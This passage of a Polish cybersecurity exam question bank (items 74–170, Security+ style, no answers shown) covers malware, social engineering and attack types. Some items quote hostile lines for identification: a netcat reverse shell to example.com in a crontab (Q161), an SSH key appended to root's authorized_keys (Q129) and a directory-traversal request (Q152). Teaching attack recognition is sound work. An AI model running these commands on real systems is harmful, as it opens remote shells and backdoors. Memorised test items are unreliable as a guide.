74. Które z poniższych najlepiej opisuje złośliwe oprogramowanie, które zostanie uruchomione jak złośliwa aktywność po spełnieniu określonego warunku (tj. jeśli warunek jest spełniony, a następnie wykonywany)?
A. Wirus sektora rozruchowego
B. Bomba logiczna
C. Przepełnienie bufora
D. Rzadki wirus infekujący
75. Jaki termin opisuje stosowanie taktyk konwersacyjnych jako części ćwiczeń socjotechnicznych w celu wyodrębnienia informacji z celów?
A. Preteksty
B. Pozyskiwanie
C. Podszywanie się
D. Zastraszanie
76. Telnet, RSH i FTP to przykłady czego?
A. Protokoły przesyłania plików
B. Niezabezpieczone protokoły
C. Podstawowe protokoły
D. Otwarte porty
77. Scott chce ustalić, skąd można uzyskać dostęp do sieci bezprzewodowej organizacji. Jakie techniki testowania są jego najbardziej prawdopodobnymi opcjami?
A. OSINT i aktywne skany
B. Jazda wojenna i latanie wojenne
C. Socjotechnika i aktywne skany
D. OSINT i prowadzenie wojny
78. Gerald jest administratorem sieci w małej firmie świadczącej usługi finansowe. Użytkownicy zgłaszają dziwne zachowanie, które wydaje się być spowodowane przez wirusa na ich komputerach. Po odizolowaniu maszyn, które według niego są zainfekowane, Gerald analizuje je. Odkrył, że wszystkie zainfekowane maszyny otrzymały wiadomość e-mail rzekomo pochodzącą z księgowości z arkuszem kalkulacyjnym Excel, a użytkownicy otworzyli arkusz kalkulacyjny. Jaki jest najbardziej prawdopodobny problem na tych maszynach?
A. Wirus makro
B. Wirus sektora rozruchowego
C. Koń trojański
D. RAT
79. Twoja firma wynajęła zewnętrzną firmę ochroniarską do wykonania różnych testów Twojej sieci. Podczas skanowania podatności udostępnisz tej firmie loginy do różnych systemów (tj. serwera bazy danych, serwera aplikacji, serwera WWW itp.), aby pomóc w ich skanowaniu. Co najlepiej to opisuje?
A. Znany test środowiskowy
B. Test szarej skrzynki
C. Poświadczony skan
D. Skanowanie inwazyjne
80. Steve odkrywa następujący kod w systemie. W jakim języku jest napisane i do czego służy?
import socket as skt
for port in range (1,9999):
try:
sc=skt.socket(askt.AF_INET,skt.SOCK_STREAM)
sc.settimeout(900)
sc.connect(('127.0.0.1,port))
print '%d:OPEN' % (port)
sc.close
except: continue
A. Perl, skanowanie podatności
B. Python, skanowanie portów
C. Bash, skanowanie podatności
D. PowerShell, skanowanie portów
81. Które z poniższych jest powszechnie stosowane w ataku typu rozproszona odmowa usługi (DDoS)?
A. Phishing
B. Oprogramowanie reklamowe
C. Botnet
D. Trojan
82. Amanda odkrywa, że członek personelu jej organizacji zainstalował trojana zdalnego dostępu na swoim serwerze oprogramowania księgowego i uzyskuje do niego zdalny dostęp. Jakie zagrożenie odkryła?
A. Dzień zerowy
B. Zagrożenie wewnętrzne
C. Błędna konfiguracja
D. Słabe szyfrowanie
83. Wpisy rosyjskich agentów podczas kampanii prezydenckiej w USA w 2016 roku na Facebooku i Twitterze są przykładem jakiego rodzaju wysiłku?
A. Podszywanie się
B. Kampania wpływu mediów społecznościowych
C. Wojna asymetryczna
D. Atak wodopoju
84. Juan jest odpowiedzialny za reagowanie na incydenty w dużej instytucji finansowej. Odkrywa, że firmowe Wi-Fi zostało naruszone. Atakujący użył tych samych danych logowania, które są dostarczane z bezprzewodowym punktem dostępu (WAP). Osoba atakująca była w stanie wykorzystać te dane uwierzytelniające, aby uzyskać dostęp do konsoli administracyjnej WAP i wprowadzić zmiany. Które z poniższych najlepiej opisuje przyczynę istnienia tej luki?
A. Nieprawidłowo skonfigurowane konta
B. Nieprzeszkoleni użytkownicy
C. Korzystanie z ustawień domyślnych
D. Brak aktualizacji systemów
85. Elizabeth prowadzi dochodzenie w sprawie naruszenia sieci w swojej firmie. Odkrywa program, który był w stanie wykonać kod w przestrzeni adresowej innego procesu, używając procesu docelowego do załadowania określonej biblioteki. Co najlepiej opisuje ten atak?
A. Bomba logiczna
B. Przejmowanie sesji
C. Przepełnienie bufora
D. Wstrzyknięcie DLL
86. Który z poniższych podmiotów zagrażających najprawdopodobniej będzie związane z zaawansowanym trwałym zagrożeniem (APT)?
A. Haktywiści
B. Podmioty państwowe
C. Dzieciaki skryptowe
D. Zagrożenia wewnętrzne
87. Jaka jest podstawowa różnica między inwazyjnym i nieinwazyjnym skanowaniem luk w zabezpieczeniach?
A. Skanowanie inwazyjne to test penetracyjny.
B. Skanowanie nieinwazyjne to tylko kontrola dokumentów.
C. Skanowanie inwazyjne może potencjalnie zakłócić operacje.
D. Skanowanie nieinwazyjne nie znajdzie większości luk w zabezpieczeniach.
88. Twoja firma zleciła stworzenie aplikacji księgowej lokalnej firmie programistycznej. Po trzech miesiącach korzystania z produktu jeden z administratorów odkrywa, że programiści wprowadzili sposób na zalogowanie się i ominięcie wszystkich zabezpieczeń i uwierzytelnień. Co najlepiej to opisuje?
A. Bomba logiczna
B. koń trojański
C. Backdoor
D. Rootkit
89. Daryl prowadzi dochodzenie w sprawie niedawnego naruszenia serwera WWW swojej firmy. Atakujący użył wyrafinowanych technik, a następnie zepsuł witrynę, pozostawiając wiadomości potępiające politykę publicznę firmy. On i jego zespół starają się określić typ aktora, który najprawdopodobniej dopuścił się naruszenia. Na podstawie dostarczonych informacji, kto był najbardziej prawdopodobnym podmiotem zagrażającym?
A. Skrypt
B. Państwo narodowe
C. Przestępczość zorganizowana
D. Haktywiści
90. Jakie dwie techniki są najczęściej kojarzone z atakiem pharming?
A. Modyfikowanie pliku hosts na komputerze lub wykorzystywanie luki w zabezpieczeniach DNS na zaufanym serwerze DNS
B. Phishing wielu użytkowników i przechwytywanie od nich adresów e-mail
C. Phishing wielu użytkowników i zbieranie od nich wielu haseł
D. Podszywanie się pod adresy IP serwerów DNS lub modyfikowanie pliku hosts na komputerze PC
91. Angela przegląda dzienniki uwierzytelniania swojej witryny i widzi próby z wielu różnych kont przy użyciu tego samego zestawu haseł. Jak nazywa się ta technika ataku?
A. Brutalne wymuszanie
B. Rozpylanie hasła
C. Ograniczone ataki na logowanie
D. Spinning konta
92. Podczas badania naruszeń i próby ich przypisania konkretnym cyberprzestępcom, który z poniższych nie jest jednym z tych wskaźników APT?
A. Długoterminowy dostęp do celu
B. Wyrafinowane ataki
C. Atak pochodzi z obcego adresu IP.
D. Atak utrzymuje się w czasie.
93. Charles odkrywa, że atakujący wykorzystał lukę w zabezpieczeniach aplikacja internetowa, którą prowadzi jego firma, a następnie wykorzystała ten exploit do uzyskania uprawnień administratora na serwerze sieciowym. Jaki rodzaj ataku odkrył?
A. Skrypty między witrynami
B. Eskalacja uprawnień
C. Wstrzyknięcie SQL
D. Stan wyścigu
94. Jaki rodzaj ataku wykorzystuje drugi bezprzewodowy punkt dostępowy (WAP) który nadaje ten sam identyfikator SSID, co legalny punkt dostępu, w próbie nakłonienia użytkowników do połączenia się z WAP atakującego?
A. Zły bliźniak
B. Spoofing IP
C. koń trojański
D. Eskalacja uprawnień
95. Które z poniższych stwierdzeń najlepiej opisuje lukę dnia zerowego?
A. Luka, o której sprzedawca jeszcze nie wie
B. Podatność, która nie została jeszcze naruszona
C. Luka, którą można szybko wykorzystać (tj. w ciągu zero dni)
D. Luka, która zapewni atakującemu krótki dostęp (tj. zero dni)
96. Jaki rodzaj ataku obejmuje dodanie wyrażenia lub frazy np. dodawanie "BEZPIECZNE" do nagłówków wiadomości?
A. Preteksty
B. Phishing
C. Wstrzyknięcie SQL
D. Oczekiwanie
97. Charles chce mieć pewność, że jego zewnętrzne prace nad rozwojem kodu są tak bezpieczne, jak to tylko możliwe. Która z poniższych czynności nie jest powszechną praktyką zapewniania bezpiecznego zdalnego opracowywania kodu?
A. Upewnij się, że programiści są przeszkoleni w zakresie bezpiecznych technik kodowania.
B. Ustaw zdefiniowane kryteria akceptacji dla bezpieczeństwa kodu.
C. Testuj kod przy użyciu automatycznych i ręcznych systemów testowania bezpieczeństwa.
D. Przeprowadź audyt wszystkich podstawowych bibliotek używanych w kodzie.
98. Odkryłeś, że na serwerze nazw domen Twojej sieci znajdują się wpisy wskazujące legalne domeny na nieznane i potencjalnie szkodliwe adresy IP. Co najlepiej opisuje ten rodzaj ataku?
A. Backdoor
B. APT
C. Zatrucie DNS
D. Koń trojański
99. Spyware jest przykładem jakiego rodzaju złośliwego oprogramowania?
A. KOT
B. Robak
C. Szczenię
D. Trojan
100. Co najlepiej opisuje atak polegający na dołączaniu złośliwego oprogramowania do legalnego programu, tak aby użytkownik instalował legalny program, niechcący instalują złośliwe oprogramowanie?
A. Backdoor
B. koń trojański
C. RA
D. Wirus polimorficzny
101. Które z poniższych stwierdzeń najlepiej opisuje oprogramowanie, które zapewni atakującemu zdalny dostęp do komputera ofiary, ale które jest zapakowane w legalny program w celu oszukania ofiary do zainstalowania go?
A. RAT
B. Backdoor
C. koń trojański
D. Wirus makro
102. Jaki proces zwykle zachodzi przed atakami z klonowaniem kart?
A. Atak brute-force
B. Atak skimmingu
C. Atak tęczowego stołu
D. Atak urodzinowy
103. Które z poniższych jest atakiem mającym na celu zaatakowanie witryny internetowej w oparciu o zaufanie witryny do uwierzytelnionego użytkownika?
A. XSS
B. XSRF
C. Przepełnienie bufora
D. RAT
104. Valerie jest odpowiedzialna za testy bezpieczeństwa aplikacji w swojej firmie. Odkryła, że aplikacja internetowa, pod pewnymi warunkami, może generować wyciek pamięci. Na jaki rodzaj ataku naraziłoby to aplikację?
A. DoS
B. Backdoor
C. Wstrzyknięcie SQL
D. Przepełnienie bufora
105. Gra mobilna, nad którą Jack pracował przez ostatni rok została wydana, a złośliwi aktorzy wysyłają ruch do serwer, na którym jest uruchomiony, aby uniemożliwić mu konkurowanie z innymi grami w App Store. Jaki jest rodzaj ataku typu "odmowa usługi"?
A. Sieciowy atak DDoS
B. Technologia operacyjna DDoS
C. GDoS
D. Aplikacja DDoS
106. Charles otrzymał zadanie zbudowania zespołu, który łączy techniki atakujących i obrońców, aby pomóc chronić jego organizację. Jaki typ zespołu buduje?
A. Czerwona drużyna
B. Niebieska drużyna
C. Biała drużyna
D. Fioletowa drużyna
107. Mike jest administratorem sieci w małej firmie świadczącej usługi finansowe. Otrzymał wyskakujące okienko z informacją, że jego pliki są teraz zaszyfrowane i musi zapłacić 0,5 bitcoina, aby je odszyfrować. Próbuje sprawdzić dane pliki, ale zmieniły się ich rozszerzenia i nie może ich otworzyć. Co najlepiej opisuje tę sytuację?
A. Maszyna Mike′a ma rootkita.
B. Maszyna Mike′a zawiera oprogramowanie ransomware.
C. Mike ma bombę logiczną.
D. Maszyna Mike′a była celem wielorybnictwa.
108. Kiedy aplikacja wielowątkowa nie obsługuje właściwie różnych wątków uzyskujących dostęp do wspólnej wartości, a jeden wątek może zmienić dane, podczas gdy inny wątek na nim polega, co to za wada?
A. Wyciek pamięci
B. Przepełnienie bufora
C. Przepełnienie liczby całkowitej
D. Czas kontroli/czas użytkowania
109. Firma Acme używa kart inteligentnych, które wykorzystują komunikację zbliżeniową (NFC) zamiast konieczności ich przeciągania. Ma to na celu zwiększenie bezpieczeństwa fizycznego dostępu do bezpiecznych obszarów. Jaką lukę może to również stworzyć?
A. Ściganie
B. Podsłuchiwanie
C. Spoofing IP
D. Warunki wyścigu
110. Rick uważa, że systemy Windows w jego organizacji są celem wirusów bezplikowych. Jeśli chce uchwycić artefakty procesu infekcji, która z poniższych opcji najprawdopodobniej zapewni mu wgląd w to, co robią?
A. Przeglądanie obrazów całego dysku zainfekowanych maszyn
B. Włączanie logowania PowerShell
C. Wyłączanie konta administratora
D. Analizowanie plików zrzutu awaryjnego systemu Windows
111. John jest odpowiedzialny za bezpieczeństwo fizyczne w dużym zakładzie produkcyjnym. Wszyscy pracownicy używają karty elektronicznej, aby otworzyć drzwi wejściowe i wejść do obiektu. Która z poniższych sytuacji jest typowym sposobem, w jaki osoby atakujące mogą obejść ten system?
A. Phishing
B. Ściganie
C. Sfałszowanie karty inteligentnej
D. Podszywanie się pod RFID
112. Adam chce pobrać listy złośliwych lub niewiarygodnych adresów IP i domen przy użyciu STIX i TAXII. Jakiej usługi szuka?
A. Kanał podatności
B. Kanał zagrożeń
C. Pasza myśliwska
D. Kanał reguł
113. Podczas dochodzenia w sprawie incydentu Naomi zauważa, że druga klawiatura została podłączona do systemu w ogólnodostępnej części budynku jej firmy. Krótko po tym zdarzeniu system został zainfekowany złośliwym oprogramowaniem, co spowodowało wyciek danych. Czego Naomi powinna szukać w swoim osobistym śledztwie?
A. Pobieranie konia trojańskiego
B. Złośliwy kabel lub dysk USB
C. Robak
D. Żadne z powyższych
114. Jesteś odpowiedzialny za reagowanie na incydenty w Acme Corporation. Odkryłeś, że ktoś był w stanie obejść proces uwierzytelniania Windows dla określonej aplikacji sieciowej. Wygląda na to, że atakujący wziął zapisany skrót hasła i wysłał go bezpośrednio do usługi uwierzytelniania zaplecza, z pominięciem aplikacji. Jaki to rodzaj ataku?
A. Podszywanie się pod hasz
B. Zły bliźniak
C. Podkładki
D. Podaj hash
115. Użytkownik w Twojej firmie zgłosił, że otrzymał telefon od kogoś, kto twierdzi, że jest z zespołu pomocy technicznej firmy. Dzwoniący stwierdził, że w firmie rozprzestrzenia się wirus i potrzebują natychmiastowego dostępu do komputera pracownika, aby zapobiec jego zainfekowaniu. Jakich zasad socjotechnicznych użył rozmówca, aby oszukać pracownika?
A. Pośpiech i zastraszanie
B. Pośpiech i autorytet
C. Władza i zaufanie
D. Zastraszanie i autorytet
116. Po przeprowadzeniu skanowania luk w zabezpieczeniach Elaine odkrywa, że stacje robocze z systemem Windows 10 w magazynie jej firmy są podatne na wiele znanych luk w zabezpieczeniach systemu Windows. Co powinna określić jako główną przyczynę w swoim raporcie dla kierownictwa?
A. Nieobsługiwane systemy operacyjne
B. Niewłaściwe lub słabe zarządzanie poprawkami dla systemów operacyjnych
C. Niewłaściwe lub słabe zarządzanie poprawkami dla oprogramowania układowego systemów
D. Korzystanie z niezabezpieczonych protokołów
117. Ahmed odkrył, że atakujący podszywali się pod adresy IP, aby zmusić je do rozwiązania problemu na inny adres sprzętowy. Manipulacja zmieniła tabele utrzymywane przez domyślną bramę dla sieci lokalnej, powodując, że dane przeznaczone dla jednego konkretnego adresu MAC są teraz kierowane gdzie indziej. Jaki to rodzaj ataku?
A. Zatrucie ARP
B. Zatrucie DNS
C. Atak na ścieżce
D. Backdoor
118. Jaki rodzaj testu penetracyjnego jest wykonywany, gdy tester otrzymuje rozległą wiedzę na temat sieci docelowej?
A. Znane środowisko
B. Pełne ujawnienie
C. Nieznane środowisko
D. Drużyna czerwona
119. Twoja firma wdraża nowy program uświadamiający bezpieczeństwo. Odpowiadasz za edukowanie użytkowników końcowych w zakresie różnych zagrożeń, w tym inżynierii społecznej. Które z poniższych najlepiej definiuje socjotechnikę?
A. Nielegalne kopiowanie oprogramowania
B. Zbieranie informacji z wyrzuconych instrukcji i wydruków
C. Wykorzystywanie umiejętności ludzi w celu uzyskania informacji zastrzeżonych
D. Wiadomości phishingowe
120. Który z poniższych ataków może być spowodowany tym, że użytkownik nie jest świadomy swojego fizycznego otoczenia?
A. Zatrucie ARP
B. Phishing
C. Surfowanie na ramieniu
D. Atak smerfów
121. Jakie są dwa najczęstsze cele oszustw związanych z fakturami?
A. Odbieranie pieniędzy lub uzyskiwanie danych uwierzytelniających
B. Pozyskiwanie danych uwierzytelniających lub dostarczanie rootkita
C. Otrzymywanie pieniędzy lub kradzież kryptowalut
D. Pozyskiwanie danych uwierzytelniających lub dostarczanie oprogramowania ransomware
122. Który z poniższych rodzajów testów wykorzystuje zautomatyzowany proces proaktywnego identyfikowania słabych punktów systemów obliczeniowych obecnych w sieci?
A. Audyt bezpieczeństwa
B. Skanowanie podatności
C. Znany test środowiskowy
D. Test nieznanego środowiska
123. John został poproszony o wykonanie testu penetracyjnego firmy. Otrzymał ogólne informacje, ale żadnych szczegółów dotyczących sieci. Co to za test?
A. Częściowo znane środowisko
B. Znane środowisko
C. Nieznane środowisko
D. Zamaskowany
124. W ramach jakiego rodzaju ataku system osoby atakującej wydaje się serwerem rzeczywistemu klientowi i klientem rzeczywistego serwera?
A. Odmowa usługi
B. Powtórka
C. Podsłuchiwanie
D. Na ścieżce
125. Jesteś administratorem bezpieczeństwa firmy Acme Corporation. Na niektórych komputerach Twojej firmy wykryto złośliwe oprogramowanie. To złośliwe oprogramowanie wydaje się przechwytywać wywołania z przeglądarki internetowej do bibliotek, a następnie manipulować wywołaniami przeglądarki. Jaki to rodzaj ataku?
A. Człowiek w przeglądarce
B. Atak na ścieżce
C. Przepełnienie bufora
D. Przejęcie sesji
126. Tony przegląda aplikację internetową i odkrywa witrynę generuje linki takie jak:
https://www.example.com/login.html?
Relay=http%3A%2F%2Fexample.com%2Fsite.html
Na jaki rodzaj luki jest najbardziej podatny ten kod?
A. Wstrzyknięcie SQL
B. Przekierowanie URL
C. Zatrucie DNS
D. Wstrzyknięcie LDAP
127. Jesteś odpowiedzialny za testowanie oprogramowania w Acme Corporation. Chcesz sprawdzić całe oprogramowanie pod kątem błędów, które mogą być wykorzystane przez atakującego w celu uzyskania dostępu do oprogramowania lub Twojej sieci. Odkryłeś aplikację internetową, która pozwoliłaby użytkownikowi na próbę umieszczenia 64-bitowej wartości w 4-bajtowej zmiennej całkowitej. Co to za wada?
A. Przepełnienie pamięci
B. Przepełnienie bufora
C. Przepełnienie zmienne
D. Przepełnienie liczby całkowitej
128. Angela odkryła atak na niektórych użytkowników jej witryny, który wykorzystuje parametry adresu URL i pliki cookie, aby skłonić legalnych użytkowników do wykonywania niepożądanych działań. Jaki rodzaj ataku najprawdopodobniej odkryła?
A. Wstrzyknięcie SQL
B. Fałszerstwo żądań między witrynami
C. Wstrzyknięcie LDAP
D. Cross-site scripting
129. Nathan odkrywa następujący kod w katalogu zaatakowanego użytkownika. Jakiego języka używa i co zrobi?
echo "ssh-rsa ABBAB4KAE9sdafAK
Mq/jc5YLfnAnbFDRABMhuWzaWUp
root@localhost">> /root/.ssh/authorized_keys
A. Python, dodaje autoryzowany klucz SSH
B. Bash, łączy się z innym systemem za pomocą klucza SSH
C. Python, łączy się z innym systemem za pomocą klucza SSH
D. Bash, dodaje autoryzowany klucz SSH
130. Jared wykrył złośliwe oprogramowanie na stacjach roboczych kilku użytkowników. To konkretne złośliwe oprogramowanie zapewnia zewnętrznemu hakerowi uprawnienia administracyjne do stacji roboczej. Co najlepiej opisuje to złośliwe oprogramowanie?
A. koń trojański
B. Bomba logiczna
C. Wirus wieloczęściowy
D. Rootkit
131. Dlaczego wycieki pamięci stanowią potencjalny problem z bezpieczeństwem?
O. Mogą ujawnić wrażliwe dane.
B. Mogą umożliwić atakującym wstrzyknięcie kodu przez wyciek.
C. Mogą powodować awarie
D. Żadne z powyższych
132. Michelle odkrywa, że wiele systemów w jej organizacji łączy się ze zmieniającym się zestawem zdalnych systemów na porcie TCP 6667. Jaka jest najbardziej prawdopodobna przyczyna tego, jeśli uważa, że ruch jest nieuzasadniony?
A. Alternatywny port usługi dla ruchu internetowego
B. Polecenie i kontrola botnetu przez IRC
C. Pobieranie za pośrednictwem sieci peer-to-peer
D. Trojany zdalnego dostępu
133. Susan przeprowadza skanowanie podatności sieci małej firmy i odkrywa, że router bezprzewodowy klasy konsumenckiej organizacji ma usterkę w swoim serwerze sieciowym. Jakim problemem powinna się zająć w swoich odkryciach?
A. Zarządzanie poprawkami oprogramowania układowego
B. Problemy z domyślną konfiguracją
C. Niezabezpieczone konto administracyjne
D. Słabe ustawienia szyfrowania
134. Gdzie jest najbardziej prawdopodobny atak RFID w ramach testu penetracyjnego?
A. Uwierzytelnianie systemu
B. Odznaki dostępu
C. Dostęp do aplikacji internetowej
D. Loginy VPN
135. Jaki rodzaj ataku phishingowego odbywa się za pośrednictwem wiadomości tekstowych?
A. Bluejacking
B. Rozbijanie
C. Podbicie telefonu
D. Wielorybnictwo tekstowe
136. Użytkownicy w Twojej firmie zgłaszają, że ktoś dzwonił do ich numeru wewnętrznego i twierdził, że przeprowadza ankietę dla dużego dostawcy. Na podstawie pytań zadanych w ankiecie podejrzewasz, że jest to oszustwo mające na celu wyłudzenie informacji od pracowników Twojej firmy. Co najlepiej to opisuje?
A. Spear phishing
B. Vishing
C. Wybieranie wojenne
D. Robocalling
137. John analizuje niedawną infekcję złośliwym oprogramowaniem w swojej sieci firmowej. Odkrywa złośliwe oprogramowanie, które może szybko rozprzestrzeniać się za pośrednictwem podatnych na ataki usług sieciowych i nie wymaga żadnej interakcji ze strony użytkownika. Co najlepiej opisuje to złośliwe oprogramowanie?
A. Robak
B. Wirus
C. Bomba logiczna
D. koń trojański
138. Twoja firma wydała kilka nowych dyrektyw bezpieczeństwa. Jeden z te nowych dyrektyw mówią, że wszystkie dokumenty muszą zostać zniszczone przed wyrzuceniem. Jakiemu rodzajowi ataku próbuje się zapobiec?
A. Phishing
B. Nurkowanie w śmietniku
C. Surfowanie na ramieniu
D. Atak na ścieżce
139. Która z poniższych czynności nie jest powszechną częścią procesu czyszczenia po teście penetracyjnym?
A. Usuwanie wszystkich plików wykonywalnych i skryptów ze złamanego systemu
B. Przywracanie wszystkich rootkitów do ich oryginalnych ustawień w systemie
C. Zwracanie wszystkich ustawień systemowych i aplikacji i konfiguracje do ich oryginalnych konfiguracji
D. Usuwanie wszelkich kont użytkowników utworzonych podczas testu penetracji
140. Odkryłeś, że ktoś próbował się zalogować do Twojego serwera WWW. Osoba próbowała wielu prawdopodobnych haseł. Jaki to rodzaj ataku?
A. Ttęczowa tabela
B. Atak urodzinowy
C. Atak słownikowy
D. Podszywanie się
141. Jim odkrywa fizyczne urządzenie podłączone do czytnika kart kredytowych pompy gazowej. Jaki rodzaj ataku prawdopodobnie odkrył?
A. Atak powtórkowy
B. Stan wyścigu
C. Skimmer
D. Klonowanie kart
142. Jaka jest podstawowa różnica między rozpoznaniem aktywnym a pasywnym?
A. Aktywny zostanie wykonany ręcznie, pasywny za pomocą narzędzi.
B. Aktywna odbywa się za pomocą testów czarnoskrzynkowych, a pasywna za pomocą testów białoskrzynkowych.
C. Aktywna jest zwykle wykonywana przez atakujących, a pasywna przez testerów.
D. Active faktycznie połączy się z siecią i może zostać wykryty; pasywny nie.
143. Pasek narzędzi przeglądarki jest przykładem jakiego rodzaju złośliwego oprogramowania?
A. Rootkit
B. RAT
C. Robak
D. PUP
144. Jaki termin opisuje dane zebrane z publicznie dostępnych źródeł, które można wykorzystać w kontekście wywiadu?
A. OPSEC
B. OSINT
C. IntCon
D. STIX
145. Jaki rodzaj ataku jest wymierzony w określoną grupę użytkowników, infekując jedną lub więcej witryn internetowych, o których ta grupa jest znana z częstego odwiedzania?
A. Atak chłodnicy wodnej
B. Atak sieci phishingowej
C. Atak wodopoju
D. Atak na staw phishingowy
146. Tracy jest zaniepokojona atakami wstrzykiwania LDAP na jej serwer katalogowy. Która z poniższych nie jest powszechną techniką zapobiegania atakom polegającym na wstrzykiwaniu LDAP?
A. Bezpieczna konfiguracja LDAP
B. Walidacja danych wejściowych użytkownika
C. Parametryzacja zapytań LDAP
D. Zasady filtrowania wyjścia
147. Fred używa proxy Tora do przeglądania stron w ramach swojej analizy zagrożeń. Jakim terminem często określa się tę część Internetu?
A. Przez zwierciadło
B. Ciemna sieć
C. Podsieć
D. Przestrzeń cebulowa
148. Jaka funkcja przeglądarki jest używana do zapobiegania udanym atakom polegającym na przekierowywaniu adresów URL?
A. Śledzenie wygaśnięcia certyfikatu
B. Wyświetlanie pełnego prawdziwego adresu URL
C. Wyłączanie plików cookie
D. Włączanie JavaScript
149. Jaka jest najważniejsza różnica między podatnościami opartymi na usługach w chmurze a podatnościami lokalnymi?
A. Twoja zdolność do samodzielnej naprawy
B. Waga luki
C. Czas potrzebny na naprawę
D. Twoja odpowiedzialność za skompromitowane dane
150. Christina przeprowadza skanowanie podatności sieci klienta i odkrywa, że bezprzewodowy router klienta w sieci zwraca wynik raportujący domyślne poświadczenia logowania. Jaki typowy problem z konfiguracją napotkała?
A. Niezałatane urządzenie
B. Brak wsparcia urządzenia
C. Niezabezpieczone konto administratora
D. Niezabezpieczone konto użytkownika
151. Jaki rodzaj zespołu jest używany do testowania bezpieczeństwa przy użyciu narzędzi i technik, których użyłby rzeczywisty atakujący?
A. Czerwona drużyna
B. Niebieska drużyna
C. Biała drużyna
D. Fioletowa drużyna
152. Przeglądając dzienniki sieciowe witryny internetowej swojej organizacji, Kathleen odkrywa wpis pokazany tutaj:
GET http://example.com/viewarticle.php?
view=../../../config.txt HTTP/1.1
Jaki rodzaj ataku potencjalnie odkryła?
A. Ataki z przechodzeniem katalogów
B. Przepełnienie bufora aplikacji internetowej
C. Atak rekurencji katalogów
D. Atak typu slashdot
153. Jaki jest kluczowy wyróżnik pomiędzy systemami SOAR i SIEM?
A. SOAR integruje się z szerszą gamą aplikacji.
B. SIEM zawiera narzędzia do zarządzania zagrożeniami i podatnościami.
C. SOAR obejmuje automatyzację operacji bezpieczeństwa.
D. SIEM obejmuje automatyzację operacji bezpieczeństwa.
154. Twoja firma zatrudniła firmę zajmującą się testami penetracyjnymi w celu przetestowania sieci. Na potrzeby testu podałeś dane firmy dotyczące używanych systemów operacyjnych, uruchamianych aplikacji i urządzeń sieciowych. Co najlepiej opisuje ten rodzaj testu?
A. Znany test środowiskowy
B. Test zewnętrzny
C. Test nieznanego środowiska
D. Test zagrożenia
155. Jakie dwa pliki są często atakowane przy użyciu metody brute-force w trybie ataku offline?
A. Rejestr Windows i plik Linux /etc/passwd
B. Windows SAM i Linux /etc/passwd plik
C. Windows SAM i Linux /etc/shadow plik
D. Rejestr Windows i plik Linux /etc/shadow
156. Jakim rodzajem ataku jest atak SSL stripping?
A. Atak brute-force
B. Atak trojana
C. Atak na ścieżce
D. Atak obniżony
157. Jakiemu rodzajowi ataków ma zapobiegać program Trusted Foundry USA?
A. Ataki na infrastrukturę krytyczną
B. Metaloplastyka i ataki rzucające
C. Ataki w łańcuchu dostaw
D. Ataki na kod źródłowy oprogramowania
158. Nicole chce pokazać kierownictwu swojej organizacji dane w czasie rzeczywistym o atakach z całego świata za pośrednictwem wielu dostawców usług w sposób wizualny. Jaki rodzaj narzędzia do analizy zagrożeń jest często używany w tym celu?
A. Wykres kołowy
B. Mapa zagrożeń
C. Narzędzie do śledzenia ciemnej sieci
D. Repozytorium OSINT
159. Zauważyłeś, że gdy jesteś w zatłoczonym miejscu, dane z twojego telefonu komórkowego są kradzione. Późniejsze dochodzenie pokazuje połączenie Bluetooth z Twoim telefonem, którego nie możesz wyjaśnić. Co opisuje ten atak?
A. Bluejacking
B. Bluesnarfing
C. Zły bliźniak
D. RAT
160. Rodzaj i zakres testów, dane kontaktowe klienta, sposób obsługi danych wrażliwych oraz rodzaj i częstotliwość spotkań statusowych i raportów to wspólne elementy tego, jaki artefakt testu penetracyjnego?
A. Zarys czarnej skrzynki
B. Zasady zaangażowania
C. Zarys białej ramki
D. Raport końcowy
161. Amanda napotyka skrypt Bash, który uruchamia następujące polecenie:
crontab -e 0 * * * * nc example.com 8989 -e /bin/bash
Co robi to polecenie?
A. Sprawdza godzinę co godzinę.
B. Co minutę pobiera dane z example.com.
C. Tworzy odwróconą powłokę.
D. Żadne z powyższych
162. Tester penetracyjny zadzwonił do pracownika pomocy technicznej w firmie, w której pracuje Charles i twierdziła, że jest dyrektorem wyższego szczebla, która potrzebowała natychmiastowej zmiany hasła z powodu ważnego spotkania, które musieli przeprowadzić, które miało się rozpocząć za kilka minut. Członek personelu zmienił hasło dyrektora na hasło dostarczone przez testera penetracji. Jaką zasadę socjotechniki wykorzystał tester penetracji, aby przeprowadzić ten atak?
A. Zastraszanie
B. Niedobór
C. Pośpiech
D. Zaufanie
163. Patrick zasubskrybował komercyjny kanał informacyjny o zagrożeniach, który jest dostarczany tylko subskrybentom, którzy zostali zweryfikowani i płacą miesięczną opłatę. Jaki termin branżowy jest używany w odniesieniu do tego typu analizy zagrożeń?
A. Zastrzeżona inteligencja zagrożeń
B. OSINT
C. ELINT
D. Wywiad o zagrożeniach korporacyjnych
164. Jaka koncepcja polowania na zagrożenia wiąże się z myśleniem jak złośliwy aktor, który pomoże zidentyfikować wskaźniki kompromisu, które w przeciwnym razie mogłyby być ukryte?
A. Fuzja inteligencji
B. Manewr
C. Analiza zagrożeń paszowych
D. Analiza biuletynu
165. Jaki typ złośliwego aktora będzie zazwyczaj miał najmniejszą dostępną ilość zasobów?
A. Państwa narodowe
B. Script kiddies
C. Haktywiści
D. Przestępczość zorganizowana
166. Powódź SYN ma na celu przytłoczenie systemu, blokując wszystkie otwarte sesje, które może tworzyć. Jaki to rodzaj ataku?
A. DDoS
B. Atak na wyczerpanie zasobów
C. Exploit aplikacji
D. Exploit podatności
167. Tester penetracyjny dzwoni do pracownika swojej organizacji docelowej i przedstawia się jako członek zespołu wsparcia IT. Pyta, czy pracownik napotkał problem ze swoim systemem, a następnie pyta o szczegóły dotyczące danej osoby, twierdząc, że musi zweryfikować, czy rozmawia z właściwą osobą. Co to za atak socjotechniczny?
A. Preteksty
B. Atak wodopoju
C. Oczekiwanie
D. Surfowanie po ramieniu
168. Jaki termin opisuje wykorzystanie samolotów lub dronów do zbierania informacji o sieci lub innych informacji w ramach testu penetracyjnego lub operacji zbierania danych wywiadowczych?
A. Droning
B. Wędkarstwo w powietrzu
C. Latanie wojenne
D. Węszenie z powietrza
169. Gabby chce chronić starszą platformę ze znanymi lukami. Która z poniższych opcji nie jest powszechną opcją dla tego?
A. Odłącz go od sieci.
B. Umieść urządzenie za dedykowaną zaporą i ogranicz ruch przychodzący i wychodzący.
C. Polegaj na przestarzałym systemie operacyjnym, aby zmylić atakujących.
D. Przenieś urządzenie do chronionej sieci VLAN.
170. Pod jakim terminem znane są w Stanach Zjednoczonych organizacje branżowe współpracujące, które analizują i udostępniają informacje o zagrożeniach cyberbezpieczeństwa w ramach swoich branż?
